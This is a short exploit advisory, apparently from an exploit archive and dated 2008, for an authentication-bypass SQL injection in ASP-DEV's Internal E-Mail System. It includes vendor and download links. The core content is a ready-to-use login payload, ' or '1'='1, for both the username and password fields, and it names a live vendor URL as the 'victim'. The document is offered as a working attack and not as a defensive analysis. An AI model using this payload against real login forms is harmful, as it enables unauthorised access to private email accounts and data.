[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ASP-DEV Internal E-Mail System (Auth Bypass) SQL Injection Vuln
# Published : 2008-12-14
# Author : Pouya_Server
# Previous Title : ASPired2Quote (quote.mdb) Remote Database Disclosure Vulnerability
# Next Title : AutositePHP 2.0.3 (LFI/CSRF/Edit File) Multiple Remote Vulnerabilities
#########################################################
---------------------------------------------------------
Portal Name: Internal E-Mail System
Vendor : http://asp-dev.com/main.asp?page=41
Download : http://asp-dev.com/download.asp?did=4
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------
#########################################################
[Auth Bypass]:
user: ' or '1'='1
pass: ' or '1'='1
---------------------------------
Victem :
http://asp-dev.com/message
# www.Syue.com [2008-12-14]